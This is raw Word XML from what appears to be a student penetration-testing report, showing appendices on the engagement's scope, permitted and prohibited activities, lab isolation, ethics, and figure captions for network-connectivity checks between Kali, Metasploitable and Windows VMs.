        <w:t xml:space="preserve"> Represents an internal corporate endpoint</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A168A0C" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>All systems were hosted within an isolated network to prevent interaction with external or real-world systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DBAD742" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>A3. Objectives</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E0E434" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>The objectives of the engagement were:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="459F87F1" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>To identify vulnerabilities within the simulated environment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142EF55B" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>To demonstrate exploitation of exposed services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68875E80" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>To simulate internal access using valid credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C41486A" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>To perform controlled data exfiltration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F83E445" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>To evaluate detection and response gaps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D91C22" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>A4. Permitted Activities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="611921DC" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>The following activities were authorised during the engagement:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C34E923" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>Network scanning and service enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E0B2FD" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>Exploitation of known vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B3F747F" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>Credential-based authentication and access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C64E4C8" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>Controlled privilege escalation attempts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A9B2CA" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>Access to shared resources and file systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3C9299" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>Data exfiltration within the lab environment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D0DFA8" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>All activities were conducted strictly within the defined scope.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48211556" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>A5. Prohibited Activities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="383C4DE6" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>The following activities were strictly prohibited:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C85393B" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>Denial-of-Service (DoS) or resource exhaustion attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF193FB" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>Destructive actions affecting system integrity or availability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C6CE49" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>Modification of system configurations beyond testing requirements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E4B904" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>Installation of persistent backdoors or long-term access mechanisms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="619A708B" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>Any interaction with external networks or real-world systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CDC7722" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>A6. Safety and Containment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D35B93" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:lastRenderedPageBreak/>
        <w:t>The lab environment was fully isolated using a host-only network configuration. This ensured that all attack activities were contained within the virtual environment and posed no risk to external systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="376CD292" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>Snapshots and backups were assumed to be available prior to testing, allowing recovery in case of system instability. Testing could be halted immediately if unintended effects were observed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D6FF68" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>A7. Assumptions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="271126DA" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>The following assumptions were made:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580C4C84" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>All systems were intentionally vulnerable for testing purposes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE03D31" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>Security controls such as EDR, SIEM, and firewalls were minimal or disabled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37986774" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>Valid credentials were available for testing internal access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC5A148" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>Full authorisation was granted for all activities within the lab environment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C946AE" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>A8. Ethical Considerations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A98768" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>All activities conducted during this engagement adhered to ethical hacking principles and professional standards. The engagement was performed solely for academic purposes and aimed at improving security awareness and understanding of cyber threats.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ABC86E8" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>No real data, systems, or organisations were impacted during this assessment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D906239" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="67150CC8" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="119" w:name="_Toc228059738"/>
      <w:bookmarkStart w:id="120" w:name="_Toc228127155"/>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Appendix B</w:t>
      </w:r>
      <w:bookmarkEnd w:id="119"/>
      <w:bookmarkEnd w:id="120"/>
    </w:p>
    <w:p w14:paraId="2D9839F6" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Network Connectivity Verification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F45C06" w14:textId="7816FDE3" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7466E751" wp14:editId="6D8DE855">
            <wp:extent cx="5737860" cy="2004060"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="14566307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7860" cy="2004060"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="107B1ADD"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11</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE46BA">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">: IP address of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>MetaSploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> VM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC24B1A" w14:textId="3FCA6C45" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2AC509D6" wp14:editId="1AAB7C40">
            <wp:extent cx="5059680" cy="3185160"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="18044610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59680" cy="3185160"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C814D8"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12</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE46BA">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>: IP address of Windows VM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D44143" w14:textId="51929CE5" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="64171083" wp14:editId="019BD04C">
            <wp:extent cx="5730240" cy="1988820"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="167666775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1988820"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D89A49"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13</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE46BA">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">: Ping from Kali to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Metasplotable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="00A39F24" w14:textId="339135B5" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63E14D26" wp14:editId="6004CF4A">
            <wp:extent cx="5730240" cy="1478280"/>
            <wp:effectExtent l="0" t="0" r="3810" b="7620"/>
            <wp:docPr id="19807768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1478280"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="201CD988" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>14</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE46BA">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>: Ping from kali to windows VM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD20BC1" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E19A5D2" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48FB3C0C" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="693B76EB" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="294DF80E" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3255F52E" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00E81640">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00E81640">
      <w:footerReference w:type="default" r:id="rId25"/>
      <w:pgSz w:w="12240" w:h="15840"/>
      <w:pgMar w:top="1440" w:right="1300" w:bottom="1440" w:left="13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B11AC" w14:textId="77777777" w:rsidR="00F835FD" w:rsidRDefault="00F835FD">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="207869E7" w14:textId="77777777" w:rsidR="00F835FD" w:rsidRDefault="00F83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548608"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Bottom of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtEndPr>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
    </w:sdtEndPr>
    <w:sdtContent>
      <w:p w14:paraId="1B55FF8E" w14:textId="1A9666AB" w:rsidR="00BF7D8D" w:rsidRDefault="00BF7D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14E596" w14:textId="22DB7FE2" w:rsidR="00E81640" w:rsidRPr="00BF7D8D" w:rsidRDefault="00E81640" w:rsidP="00BF7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8E450" w14:textId="77777777" w:rsidR="00F835FD" w:rsidRDefault="00F835FD">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="601256E4" w14:textId="77777777" w:rsidR="00F835FD" w:rsidRDefault="00F835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9410B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1C08E5A6"/>
    <w:lvl w:ilvl="0" w:tplc="B6BCEAA0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
